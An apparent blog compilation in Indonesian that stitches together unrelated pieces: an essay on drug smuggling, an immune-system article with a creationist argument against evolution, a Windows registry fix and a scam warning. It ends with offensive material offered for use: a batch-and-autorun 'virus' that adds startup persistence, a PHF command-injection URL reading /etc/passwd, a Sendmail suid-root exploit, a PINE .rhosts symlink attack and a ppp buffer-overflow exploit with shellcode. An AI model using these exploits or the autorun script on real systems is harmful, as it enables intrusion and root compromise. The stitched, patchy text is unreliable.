PERDAGANGAN NARKOBA

INTERNASIONAL

1. PENDAHULUAN

Kelompok mafia narkoba dan obat psikotropika kini semakin canggih dalam menjalankan aksinya. Mereka menggunakan modus - modus terbaru untuk membawa barang haram itu masuk ke negara kita. Mereka tidak pernah mengenal kata menyerah untuk memuluskan bisnis barang mematikan itu. Dalam beberapa bulan terakhir penyelundupan narkoba lewat peti kemas Bandara Soekarno - Hatta dan Pelabuhan Tanjung Priok kian marak. Bahkan dengan modus yang semakin canggih, karena pihak aparat keamanan dalam beberapa tahun terakhir sangat gencar melakukan pemberantasan narkoba termasuk upaya memutus mata rantai perdagangan internasional. Barang - barang haram yang masuk ke Indonesia sebagian besar didatangkan dari luar negeri, terutama bahan bakunya, seperti bahan baku ekstasi, heroin, haxis, sabu atau jenis narkoba lainnya.

2. PEMBAHASAN

Selama ini para penyelundup narkoba dari diluar negeri atau luar pulau masuk ke Jakarta melalui Bandar Udara Soekarno - Hatta atau Pelabuhan Tanjung Priok. Mereka membawa narkoba dengan koper, tas atau dimasukkan ke barang - barang bawaan yang dilapisi alatant detektor. Biasanya barang - barang tersebut tidak sesuai dengan dokumen yang dimiliki untuk mengelabui petugas. Cara lain untuk mengelabui petugas Bea Cukai Bandara Soekarno - Hatta yaitu menyembunyikan narkoba lewat pakaian, makanan, minuman dan mainan anak - anak. Bahkan pelaku menaruh narkoba didalam tubuhnya. Sepanjang tahun 2008 ini Bea dan Cukai Bandara Soekarno - Hatta Cengkareng, misalnya berhasil menggagalkan enam kali upaya penyelundupan psikotropika. Diantaranya penyelundupan 1,8 kilogram sabu dan 1 kilogram ketamin senilai 5 milyar oleh Kwan Cimin, warga Cina pada 5 Mei lalu.
Selain itu juga ketamin 3 kilogram senilai 6 milyar rupiah oleh Richie Charlie Peterson dan Yohanes Tarkam warga Indonesia pada 26 April. Sebelumnya 20 Februari sebanyak 515,56 gram kokain yang dibawa warga Inggris dan 2 wanita Taiwan dengan cara diselipkan ditas penumpang. Bahkan ada modus yang mencoba menaburkan obat - obat psikotropika didalam koper sehingga sulit di deteksi. Sejumlh pelaku yang tertangkap mengaku hanya sebagai kurir. Mereka mendapatkan upah dari orang yang menyuruhnya.
Meksi aparat Bea Cukai semakin intensif melakukan upaya menggagalkan penyelundupan narkoba, namun para penyelundup juga semakin canggih menggunakan modus - modus baru, diantaranya memasukan narkoba ke dalam permen dan alat - alat kosmetik.Sementara itu saat ini para penyelundup juga lebih menyukai pembawa narkoba dalam paket besar melalui jalur laut dan antar pulau menggunakan kapal - kapal kecil sehingga bias masuk tanpa melewati alat deteksi.Aparat kepolisian sudah mulai mencium modus baru tersebut sehingga berupaya keras menggunakan barang mafia narkoba kelas dunia disejumlah titik pantai yang curigai. Meski aparat berupaya keras memberantas dan memutus sampai perdagangan internasional narkotika dan obat - obatan psikotropika, namun para pedagang selalu tidak pernah kehilangan karena pasar narkoba di Indonesia terutama di kota - kota besar, seperti Jakarta, Surabaya, Bandung dan Bali sangat potensial.
Selama bertahun-tahun para sindikat perdagangan narkotika dan obat-obat spikotropika menjadikan bandar udara sebagai pintu masuk utama. Di Indonesia sendiri, perdagangan barang haram untuk jenis - jenis tertentu mulai marak sejak tahun 1997.
Awalnya barang-barang tersebut dibawa masuk dai negara-negara kawasan segi tiga emas dan bulan sabit emas. Negara segi tiga emas penghasil narkoba adalah Myanmar, Laos dan Thailand. Sementara bulan sabit emas adalah Iran, Pakistan dan Afganistan. Biasanya barang haram yang dibawa dari negara bulan sabit emas dilakukan oleh orang-orang Afrika berkulit hitam. Namun belakangan barang-barang haram tersebut masuk dari berbagai negara seperti Amerika, Belanda, Hongkong, Malaysia dan Singapura. Karena itu aparat Bea Cukai di Bandar Udara Soekarno Hatta akan lebih intensif mengawasi warga yang berasal dari negara kawasan segi tiga emas dan bulan sabit emas.
Proses rekruetmen menjadi anggota sindikat perdagangan narkoba dan psikotropika internasional juga sangat rumit dan lama. Tidak sembarang orang dapat melakukannya.
Sang bandar juga sangat berhati-hati dalam merekrut kurir. Sebelumnya harus ada semacam proses rekruetmen menjadi anggota melalui berbagai tahap. Jika sudah yakin barulah dipercaya untuk melakukan operasi penyelundupan. Hubungan diantara mereka pasti sudah sangat dekat dan lebih mirip hubungan keluarga. Modus dan proses pengiriman narkoba dan obat-obat spikotropika kini juga semakin beragam. Sindikat perdagangan internasional juga selalu melihat celah pintu masuk ke negara-negara tujuan.
Ketika di bandara pengamanan sudah semakin ketat dan menggunakan alat-alat yang canggih mereka juga berusaha menggunakan cara-cara baru. Mereka memasukan barang-barang haram tersebut kedalam barang atau benda yang tidak mencurigakan.
Sementara kuantitas pengiriman juga tidak dalam jumlah yang sangat besar, namun continue. Sasaran utama juga sudah mulai bergeser. Meski bandar udara masih digunakan sebagai pintu masuk, namun disinyalir mereka kini menggunakan pintu masuk yang tidak melewati alat-alat deteksi terutama melalui pelabuhan antar pulau.
Atau kawasan-kawasan pantai dengan menggunakan kapal-kapal pribadi. Baru setelah sampai didaerah sasaran, barang yang dapat merusak mental bangsa ini menyebar ke kurir-kurir kecil di lokasi hiburan malam disejumlah kota besar.
Narkoba dan obat psikotropika kini menjadi musuh utama bangsa Indonesia, selain korupsi dan kemiskinan. Pemerintah melalui aparat kepolisian dan Bea Cukai terus berupaya memberantas mata rantai perdagangan barang yang merusak generasi muda tersebut.
Badan Narkotika Nasional (BNN) yang ditunjuk khusus memberantas perdagangan dan peredaran narkotika membentuk Satuan Tugas Khusus yang beranggotakan berbagai instansi yang berada di bandara yang diketuai oleh Kepala Bea Cukainya.
Selain bertugas untuk pendidikan dan pencegahan masuknya narkoba di bandara, Satgas tersebut juga untuk menjalin kerjasama dengan sejumlah bandar internasional lainnya. Sejumlah alat pemantau yang bisa mendeteksi apakah orang - orang tersebut mencurigakan atau tidak dapat dimonitor oleh aparat yang bertugas.
Alat - alat tersebut beragam dan tersebar diberbagai sudut areal Terminal Kedatangan Bandara Soekarno - Hatta, Jakarta. Selain alat - alat canggih, anjing pelacak yang terlatih selalu disiagakan untuk membantu melacak barang bawaan penumpang yang mencurigakan.

3. KESIMPULAN

Narkotika dan obat - obat psikotropika memang terbukti memiliki daya hancur yang luar biasa terutama bagi generasi muda. Dari penelitian Badan Narkotika Nasional dan Universitas Indonesia, saat jenis diseluruh Indonesia terdapat 3,2 juta penduduk atau 1,5 persen dari total penduduk yang menjadi pecandu narkoba, dan 800 ribu diantaranya menggunakan jarum suntik. Sebagian besar pengguna adalah laki - laki dengan prosentasi 79 persen dan 21 persen perempuan. Akibat penyalahgunaan narkoba kerugian bangsa Indonesia hingga tahun 2009 diperkirakan mencapai 46,5 triliun rupiah, bahkan jika tidak ditanggulangi akumulasi kerugian bisa mencapai 207 triliun rupiah. Karena itu tidak ada kata lain kecuali bangsa Indonesia harus bersama - sama memberantas narkoba.
Masyarakat sudah saatnya menjadi polisi bagi lingkungannya sendiri. Jika ada yang mencurigakan masyarakat harus berani bertindak tegas. Bahkan sudah saatnya pengenalan bahaya narkoba melibatkan institusi pendidikan, karena narkoba nyata-nyata menjadi penghancur jiwa dan raga generasi muda. Ribuan orang kini menjadi korban keganasan narkoba. Tentu kita tidak akan rela akan jatuh korban - korban baru setiap hari, setiap menit dan setiap detik ke lembah kehancuran.

SISTEM PERTAHANAN TUBUH

Sekitar 250 tahun lalu, dengan ditemukannya mikroskop, para ilmu-wan mendapati bahwa kita hidup bersama banyak makhluk kecil, yang tidak dapat kita lihat dengan mata telanjang. Makhluk ini ada di mana-mana, dari udara yang kita hirup, sampai benda apa pun yang bersinggungan dengan permukaan tubuh kita. Juga ditemukan bahwa makhluk-makhluk ini berpenetrasi memasuki tubuh manusia.

Meski keberadaan musuh ini ditemukan dua setengah abad lalu, se-bagian besar rahasia “sistem pertahanan” yang bertempur dengan gigih belumlah tersingkapkan. Begitu ada benda asing memasuki tubuh, seca-ra spontan sistem molekular tubuh ini diaktifkan. Dengan rancangan strategi hebat, ia menyatakan perang mati-matian melawan musuh. Kalau kita lihat sekilas cara kerja sistem ini, tampak bahwa setiap tahapan berlangsung berdasarkan suatu rencana yang sangat cermat.

Sistem yang Tak Pernah Tidur

Kita sadari atau tidak, jutaan operasi dan reaksi berlangsung dalam tubuh kita setiap detiknya. Hal ini terus berlangsung walaupun kita sedang tidur.

Kegiatan yang padat ini terjadi dalam selang waktu yang menurut pandangan kita sangat singkat. Ada perbedaan mendasar antara pan-dangan tentang waktu dalam kehidupan kita sehari-hari dengan waktu biologis tubuh kita. Rentang satu detik yang melambangkan selang wak-tu sangat pendek dalam keseharian kita, berjalan sangat lama bagi kebanyakan sistem dan organ yang bekerja dalam tubuh kita. Jika semua kegiatan yang dilaksanakan oleh semua organ, jaringan, dan sel tubuh dalam satu detik itu dituliskan, hasilnya tak terbayangkan, di luar batasan pikiran manusia.

Salah satu sistem terpenting, yang terus-menerus melakukan kegiat-an dan tidak pernah melalaikan tugasnya, adalah sistem pertahanan. Sistem ini melindungi tubuh siang dan malam dari semua jenis penye-rang. Ia bekerja dengan penuh ketekunan, layaknya pasukan tempur berperalatan lengkap, bagi tubuh yang dilayaninya.

Setiap sistem, organ, atau kelompok sel di dalam tubuh mewakili ke-seluruhan di dalam suatu pembagian kerja yang sempurna. Setiap kega-galan dalam sistem menghancurkan tatanan ini. Dan sistem kekebalan sangat diperlukan.

Mungkinkah kita bertahan hidup kalau sistem pertahanan tidak ada? Atau, hidup macam apa yang akan kita jalani jika sistem ini gagal memenuhi sebagian fungsinya?

Tidak sukar memperkirakan jawabannya. Sejumlah contoh di dunia kedokteran memperjelas betapa pentingnya sistem kekebalan. Kisah pasien yang dikutip dalam banyak sumber terkait memperlihatkan beta-pa sulitnya hidup yang harus dijalani pada kasus adanya gangguan dalam sistem pertahanan.

Begitu lahir, pasien ini langsung ditempatkan di sebuah tenda plas-tik steril. Tidak ada satu pun yang diperbolehkan masuk. Pasien itu dila-rang menyentuh manusia lainnya. Ketika dia tumbuh besar, dia ditem-patkan di tenda plastik yang lebih besar. Untuk keluar dari tendanya, dia harus memakai seperangkat peralatan yang dirancang khusus mirip pakaian astronot. Apa yang menghalangi pasien ini menjalani hidup normal seperti orang lain? Setelah lahir, sistem kekebalan pasien ini tidak berkembang normal. Tidak ada pasukan bersenjata di tubuhnya untuk melindunginya dari musuh.

Dokter yang menangani anak itu sadar dengan apa yang bakal ter-jadi jika dia memasuki lingkungan normal. Dia akan segera menderita pi-lek, penyakit bersarang di tenggorokannya; walau diberi antibiotik dan perlakuan medis lainnya, dia akan menderita infeksi ini, infeksi itu. Tidak lama, perawatan medis akan kehilangan efek, berakibat pada kematian anak laki-laki itu.

Paling-paling anak laki-laki itu hanya akan bisa hidup beberapa bulan atau beberapa tahun di luar lingkungan yang aman tersebut. Maka dunia anak laki-laki itu selamanya dibatasi oleh dinding tenda plastiknya.

Setelah beberapa waktu, dokter dan keluarganya menempatkan anak itu di sebuah ruang yang betul-betul bebas hama yang dipersiapkan khusus di rumahnya. Akan tetapi, semua upaya ini tidak membuahkan hasil. Di awal umur belasan, anak itu meninggal ketika transplantasi tulang gagal.1

Keluarganya, para dokter, staf rumah sakit tempat dia dirawat sebe-lumnya, serta perusahaan farmasi, telah berusaha semampu mereka un-tuk menjaga anak laki-laki tersebut bertahan hidup. Walaupun mutlak se-galanya sudah diupayakan, dan tempat tinggal anak laki-laki itu selalu disuci-hamakan, kematiannya tidak dapat dicegah.

Akhir kisah ini memperlihatkan bahwa tidak mungkin bagi manusia untuk bertahan hidup tanpa adanya sistem kekebalan yang melindungi mereka dari mikroba. Hal ini membuktikan bahwa sistem kekebalan pastilah sudah ada lengkap dan menyeluruh sejak manusia pertama. Oleh karena itu, tidak masuk akal kalau sistem seperti itu berkembang secara bertahap dalam selang waktu yang sangat lama sebagaimana dinyatakan oleh teori evolusi. Manusia tanpa sistem kekebalan, atau dengan sistem kekebalan yang tidak berfungsi, akan segera meninggal seperti pada contoh kasus di atas.

Picture Text

PASUKAN DI DALAM TUBUH

Di dalam nodus limfa pecah pertempuran antara penyerang tubuh dan pasukan pertahanan. Ketika bakteri masuk melalui saluran limfatis (1), makrofag menelan sebagian penyerang itu (2), menghancurkannya, dan menunjukkan penanda identitas bakteri itu di permukaannya sendiri. Pesan kimiawi ini diberikan untuk semacam sel darah putih yang dikenal sebagai sel T penolong (3), yang menanggapi dengan memperbanyak (4) dan melepaskan pesan kimia yang memanggil lebih banyak pasukan ke bagian itu (5). Sel T lain memberi isyarat kepada sel B untuk turun ke kancah pertempuran (6). Sebagian sel B mulai bereproduksi (7), dan sel-sel baru ini menyimpan informasi untuk membantu tubuh memerangi musuh yang sama di kemudian hari (8). Sel B lain mengeluarkan ribuan antibodi setiap detik (9), memaksa bakteri menggumpal (10). Selanjutnya makrofag menyapu habis, menelan gumpalan bakteri sementara molekul protein tertentu dan antibodi membuat bakteri mudah ditelan makrofag (11). Terkadang, protein tadi langsung membunuh bakteri dengan merobek dinding selnya (12). Makrofag pembersih kemudian membersihkan seluruh nodus dari sisa-sisa pertempuran, menelan antibodi yang berserakan, bakteri mati, dan puing-puing lain sampai infeksi itu hilang.

Anak laki-laki dalam gelembung. Terlahir pada 1971 tanpa kekebalan tubuh, dia dilahirkan dalam lingkungan suci-hama di sebuah rumah sakit. Walau demikian, kematiannya tidak dapat dicegah.

Mengatasi Virus yg melakukan super hidden Folder ಅಂದ

komputer anda terkena Virus yg ber type menyembunyikan file file penting anda?

atau istilah nya super hidden,dan di menu folder options “show hidden files and folders ” juga hilang?

solusi nya install ulang aja!wkwkkwkw bcanda

oke silahkan ikuti beberapa cara di bawah ini

cara 1

Buka registry editor : klik Start, pilih Run dan ketik “regedit” (tanpa tanda kutip) .

Kemudian arahkan bagian kiri pada key di bawah ini :
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Folder\Hidden]

Pada bagian kanan buatlah String Value dengan nama value “Type” kemudian double klik dan isi bagian value data dengan “group”. Tutup aplikasi regedit kemudian restart komputer.

cara 2

Bikin DWORD value, kasih nama “Hidden”

User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced]
Value Name: Hidden
Data Type: REG_DWORD (DWORD Value)
Value Data: (1 = show hidden, 2 = Ngga Show)

cara 3

coba ketik ini di command prompt : attrib G:\*.* -s -h /S /D (asumsi: G:\ adalah drive usb flahdisk ybs)

Kalo gagal coba lakukan per folder/file. ganti *.* dengan nama folder/file yang diinginkan.

Contoh : attrib G:\folder1 -s -h /S /D
attrib G:\folder1 -s -h /S /D
attrib G:\namafile1.ext -s -h
attrib G:\namafile1.ext -s -h

Untuk keterangan lengkap soal option ATTRIB ini, ketik attrib.exe /? di command prompt.

cara 4

Masuk kesini:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\

HideFileExt

Brosing key key yang ada disana:
Rubah value CheckedValue ke 2 ato 1
Rubah value DefaultValue ke 2 ato 1

Cara nge-hack password!

Sebelum kita masuk ke inti pembicaraan, ada baiknya gua klarifikasi dulu. This is NOT an article about how to hack an account. So, bagi kamu yang berpikir akan mendapatkan langkah-langkah hacking, gak usah baca lagi deh. Ntar kecewa. Emang, judul artikelnya 'ngundang' banget! hehehe...

Umm... mungkin kamu-kamu pernah baca email ataupun artikel yang ditulis dibeberapa situs tentang "Cara mendapatkan password dari email account di hotmail" atau sejenisnya. Pada dasarnya isinya adalah langkah-langkah pasti gimana cara mencari password email 'mangsa' kamu.
Nah, contoh dari imel yang gua baca beberapa bulan yang lalu adalah sebagai berikut:
(isi gua persingkat biar gak terlalu panjang)

How to hack a hotmail account - Step by step guide

1. Know your victim email address
2. Send an email to bot-assistant@hotmail.com that contains the following items:

Subject: pass
Body:
#your-email@address.com#your-password#victim-email@address.com

3. Send your email
4. You will receive the victim password after 3 days right in your INBOX!!!

Sekilas emang kelihatannya meyakinkan dan gampang sekali melakukannya. Melalui apa yang gua baca juga nih, banyak sekali orang-orang, terutama pada hacker-wanna-be yang melakukan cara ini untuk mendapatkan password dari email account musuhnya.

Apa yang terjadi? gua rasa loe udah pada tau kalo hal ginian boong besar. Udah ada yang sempat nyoba? huehuehue... kalo udah... cepetan deh ganti password loe! karena tujuan dari pembuat artikel justru adalah kebalikannya. Bukannya kamu dikirimi password dari email account 'mangsa' kamu tapi justru email account kamu lah yang dijebol orang. Perhatikan pada langkah-langkah diatas dimana kamu juga memberikan informasi email dan password kamu ke bot-assistant@hotmail.com.

Email bot-assistant@hotmail.com itu adalah account dari si-pembuat artikel yang ingin menjaring orang-orang yang suka ama 'instant' solution.

Oleh scoppc

Cara Buat virus sederhana dari notepad

ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari

windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus

(setahu saya….. )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:

- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:

@echo off

copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y

copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y

copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y

copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y

copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y

copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f

reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f

reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f

reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f

reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)

- buat Autorun.inf dengan script:

[autorun]

open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)

- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY

- copy file-file tsb ke CD

- nikmati efeknya

note:

- jangan disalahgunakan

- maaf kalau pernah diposting

- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir ….

- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi ….

- kalau mau buat anti virusnya tinggal di modifikasi nilainya….

Mungkin dari Anda sudah banyak yang menjadi UNIX hacker ( kalo gw sih newbie, tapi yg sok tau ), tapi bagi yang sering hacking lewat windows ada baiknya mencobanya. Metodologi atau terminology atau anatomi atau cara singkatnya (qe..qe..qe Sok mantap bahasa lo lay J) yang ada :

1. Mendapatkan Password melalui FTP
2. Teknik PHF
3. Telnet dan Exploits

OK langsung saja J

Mendapatkan Password

Cara termudah mendapatkan akses superuser dapat melalui akses ftp ke sebuah webpage. Tentunya kamu juga harus mengerti isi dari file password.

root:User:d7Bdg:1n2HG2:1127:20:Superuser

AkedaBagus:p5Y(h0tiC:1229:20:Akeda Bagus,:/usr/people/akedabagus:/bin/csh

MTong:EUyd5XAAtv2dA:1129:20:Malih Tong:/usr/people/mtong:/bin/csh

Ini merupakan contoh password file yang terenkripsi. Bagian yang perlu diperhatikan adalah :

root:x:0:1:Superuser:/:

ftp:x:202:102:Anonymous ftp:/u1/ftp:

ftpadmin:x:203:102:ftp Administrator:/u1/ftp

Berikut ini contoh lain dari file password, ini memiliki sedikit perbedaan, yaitu apa yg dikenal shadow. Yup file ini ter-shadow. File yg ter-shadow menyebabkan file tidak dapat dilihat atau dicopy seperti password terenkripsi biasanya. Contoh dari file password yang dishadow :

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh

daemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:

sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:

lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/:

uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:

nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:uid no body:/:

noaccess:x:60002:60002:uid no access:/:

webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh

pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false

ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

file tershadow mempunyai “x” di tempat password tsb atau terkadang tersamarkan oleh *.

Setelah mengenal sedikit password file, dan mudah-mudahan dengan mudah dapat mengidentifikasinya. Sekarang kita beranjak ke cara untuk meng-cracknya.

Mengcrack password tidaklah sesulit apa yang kita bayangkan, walaupun jenis file berbeda-beda dari beberapa system. Langkah pertama yang dilakukan adalah mendownload atau mengcopy file tsb. Langkah selanjutnya mencari password cracker atau dictionary maker ( sesuaikan dengan jenis file yg Anda dapat ). Dimana nyarinya ? …hmm biasakan mencari dahulu dengan search engine seperti google. Atau bisa juga ke astalavista, di sini ada search engine buat nyari tool hacking. Sebagai referensi penulis hanya menggunakan cracker tool seperti : Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Lalu untuk dictionary maker atau dictionary file… Ketika kita ( Kita ..? Lo aja sendiriJ ) memulai mengcrack sebuah program, maka kita akan ditanyakan untuk menemukan password file. Itulah fungsi dictionary maker. Kamu dapat mendownload di situs hacker yang bertebaran. Dictionary maker dapat bekerja pada kombinasi huruf dengan alphabet yang dapat kita pilih ( ASCII, huruf besar, huruf kecil serta angka ). Lalu mulailah mengcrack sesuai perintah yang diberikan dari tool-tool tsb.

Teknik PHF

Kebanyakan orang telah mengetahui teknik ini dan kebanyakan server telah menemukan bug ini dan telah memperbaikinya. Namun tak ada salahnya mencantumkannya sebagai referensi.

Phf teknik merupakan cara termudah ( Sok tau… sorry gw juga newbie J) mendapatkan password. Untuk melakukannya hanya buka browser dan dan ketik :

http://nama_webpage/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Ganti nama_webpage dengan domain. Jadi jika kamu mencoba mendapatkan file pasword dari www.akeda.com ketik:

http://www.akeda.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Yeah Cuma gitu! Santai dan copy filenya(jika masih jalan lo... Yach L).

Telnet dan Exploits

Sebenarnya inilah cara terbaik ( menurut gw ) menghack webpages, tapi agak sulit dibandingkan meggunakan ftp atau phf. Sebelum mensetup exploit, kamu harus ada telnetnya. Exploits memberitahu sistem jika ada error atau bug dan biasanya bekerja untuk mendapatkan akses root. Banyak sekali jenis exploits bertebaran di internet.

Exploit ini dikenal dengan nama Sendmail v.8.8.4, ini akan membuat program suid /tmp/x atau shell root. Cara mensetupnya :

cat <<>/tmp/x.c

#define RUN "/bin/ksh"

#include

main()

{

execl(RUN,RUN,NULL);

}

_EOF_

#

cat <<>/tmp/spawnfish.c

main()

{

execl("/usr/lib/sendmail","/tmp/smtpd",0);

}

_EOF_

#

cat <<>/tmp/smtpd.c

main()

{

setuid(0); setgid(0);

system("chown root /tmp/x ;chmod 4755 /tmp/x");

}

_EOF_

#

#

gcc -O -o /tmp/x /tmp/x.c

gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c

#

/tmp/spawnfish

kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`

rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c

sleep 5

if [ -u /tmp/x ] ; then

echo "leet..."

/tmp/x

fi

dan sekarang exploit lainnya. Saya akan menjelaskan pine exploit melalui linux. Dengan melihat tabel proses dengan ps untuk melihat user mana yang lagi menjalankan PINE, lalu ls /tmp/ untuk memperoleh nama lockfile untuk setiap user. Lihat lagi tabel proses, maka sekarang akan tampak setiap user yg keluar PINE atau kehabisan space pesan di inboxnya, secara efektif akan menghapus setiap lockfile.

Buatlah sebuah link ke /tmp/.hamors_lockfile to ~hamors/.rhosts(umumnya begini) akan menyebabkan PINE membuat ~harmors/.rhosts sebagai file 666 dengan PINE proses id didalamnya. Atau simpelnya echo "+ +" > /tmp/.hamors_lockfile, lalu rm /tmp/.hamors_lockfile.

* Berikut ini cuplikan dari Sean B. Hamor ... Dalam contoh ini harmor sebagai korban, sedangkan catluvr attackernya.

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine

catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine

hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors

- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine

catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine

catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine

hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4

+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Yang terakhir gw kasihtau adalah script exploit untuk ppp yng vulner. Kacaukan dengan angka jika tak dapat bekerja. Ini cara mensetupnya :

#include

#include

#include

#define BUFFER_SIZE 156 /* size of the bufer to overflow */

#define OFFSET -290 /* number of bytes to jump after the start

of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[])

{

char *buf = NULL;

unsigned long *addr_ptr = NULL;

char *ptr = NULL;

char execshell[] =

"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */

"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */

"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */

"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */

int i,j;

buf = malloc(4096);

/* fill start of bufer with nops */

i = BUFFER_SIZE-strlen(execshell);

memset(buf, 0x90, i);

ptr = buf + i;

/* place exploit code into the buffer */

for(i = 0; i <>

*ptr++ = execshell[i];

addr_ptr = (long *)ptr;

for(i=0;i < (104/4); i++)

*addr_ptr++ = get_esp() + OFFSET;

ptr = (char *)addr_ptr;

*ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL);

}

Setelah mendapat akses root, sebaiknya lo ganti passwordnya sebelum menghapus atau mengganti sesuatu। Untuk mengganti account mereka login via telnet dengan account barumu। Ketik passwd, lalu akan menanyakan password baru yang akan kau ganti.

Akeda Bagus Jully Setiasgi

akeda_bagus@telkom.net